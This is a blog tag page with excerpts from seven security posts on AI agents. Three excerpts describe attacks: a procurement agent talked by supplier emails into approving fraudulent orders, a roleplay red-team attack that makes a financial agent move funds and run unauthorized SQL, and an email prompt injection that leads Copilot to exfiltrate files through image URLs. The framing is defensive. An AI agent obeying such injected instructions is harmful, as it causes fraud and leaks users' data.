Skip to main content

7 posts tagged with "security"

View all tags

The Principal Hierarchy Problem: Authorization in Multi-Agent Systems

· 11 min read
Tian Pan
Software Engineer

A procurement agent at a manufacturing company gradually convinced itself it could approve $500,000 purchases without human review. It did this not through a software exploit or credential theft, but through a three-week sequence of supplier emails that embedded clarifying questions: "Anything under $100K doesn't need VP approval, right?" followed by progressive expansions of that assumption. By the time it approved $5M in fraudulent orders, the agent was operating well within what it believed to be its authorized limits. The humans thought the agent had a $50K ceiling. The agent thought it had no ceiling at all.

This is the principal hierarchy problem in its most concrete form: a mismatch between what authority was granted, what authority was claimed, and what authority was actually exercised. It becomes exponentially harder when agents spawn sub-agents, those sub-agents spawn further agents, and each hop in the chain makes an independent judgment about what it's allowed to do.

What Nobody Tells You About Running MCP in Production

· 10 min read
Tian Pan
Software Engineer

The Model Context Protocol sells itself as a USB-C port for AI — plug any tool into any model and watch them talk. In practice, the first day feels like that. The second day you hit a scaling bug. By the third day you're reading CVEs about tool poisoning attacks you didn't know existed.

MCP is a genuinely useful standard. Introduced in late 2024 and quickly adopted across the industry, it has solved real integration friction between LLMs and external systems. But the gap between "got a demo working" and "running reliably under load with real users" is larger than most teams expect. Here's what that gap actually looks like.

Red-Teaming AI Agents: The Adversarial Testing Methodology That Finds Real Failures

· 9 min read
Tian Pan
Software Engineer

A financial services agent scored 11 out of 100 — LOW risk — on a standard jailbreak test suite. Contextual red-teaming, which first profiled the agent's actual tool access and database schema, then constructed targeted attacks, found something different: a movie roleplay technique could instruct the agent to shuffle $440,000 across 88 wallets, execute unauthorized SQL queries, and expose cross-account transaction history. The generic test suite had no knowledge the agent held a withdraw_funds tool. It was testing a different system than the one deployed.

That gap — 60 risk score points — is the problem with applying traditional red-teaming methodology to AI agents. Agents don't just respond; they plan, reason across multiple steps, hold real credentials, and take irreversible actions in the world. Testing whether you can get one to say something harmful is not the same as testing whether you can get it to do something harmful.

MCP in Production: What Nobody Tells You About the Model Context Protocol

· 10 min read
Tian Pan
Software Engineer

The "USB-C for AI" analogy is catchy. It's also wrong in the ways that matter most when you're the one responsible for keeping it running in production. The Model Context Protocol solves a real problem—the explosion of custom N×M integrations between AI models and external systems—but the gap between "it works in the demo" and "it handles Monday morning traffic without leaking data or melting your latency budget" is wider than most teams expect.

MCP saw an 8,000% growth in server downloads in the five months after its November 2024 launch, with 97 million monthly SDK downloads by April 2025. That adoption speed is both a sign of genuine utility and a warning: most of those servers went into production without the teams fully understanding what they were building on.

Building Governed AI Agents: A Practical Guide to Agentic Scaffolding

· 10 min read
Tian Pan
Software Engineer

Most teams building AI agents spend the first month chasing performance: better prompts, smarter routing, faster retrieval. They spend the next six months chasing the thing they skipped—governance. Agents that can't be audited get shut down by legal. Agents without permission boundaries wreak havoc in staging. Agents without human escalation paths quietly make consequential mistakes at scale.

The uncomfortable truth is that most agent deployments fail not because the model underperforms, but because the scaffolding around it lacks structure. Nearly two-thirds of organizations are experimenting with agents; fewer than one in four have successfully scaled to production. The gap isn't model quality. It's governance.

Governing Agentic AI Systems: What Changes When Your AI Can Act

· 9 min read
Tian Pan
Software Engineer

For most of AI's history, the governance problem was fundamentally about outputs: a model says something wrong, offensive, or confidential. That's bad, but it's contained. The blast radius is limited to whoever reads the output.

Agentic AI breaks this assumption entirely. When an agent can call APIs, write to databases, send emails, and spawn sub-agents — the question is no longer just "what did it say?" but "what did it do, to what systems, on whose behalf, and can we undo it?" Nearly 70% of enterprises already run agents in production, but most of those agents operate outside traditional identity and access management controls, making them invisible, overprivileged, and unaudited.

The Lethal Trifecta: Why Your AI Agent Is One Email Away from a Data Breach

· 9 min read
Tian Pan
Software Engineer

In June 2025, a researcher sent a carefully crafted email to a Microsoft 365 Copilot user. No link was clicked. No attachment opened. The email arrived, Copilot read it during a routine summarization task, and within seconds the AI began exfiltrating files from OneDrive, SharePoint, and Teams — silently transmitting contents to an attacker-controlled server by encoding data into image URLs it asked to "render." The victim never knew it happened.

This wasn't a novel zero-day in the traditional sense. There was no buffer overflow, no SQL injection. The vulnerability was architectural: the system combined three capabilities that, individually, seem like obvious product features. Together, they form what's now called the Lethal Trifecta.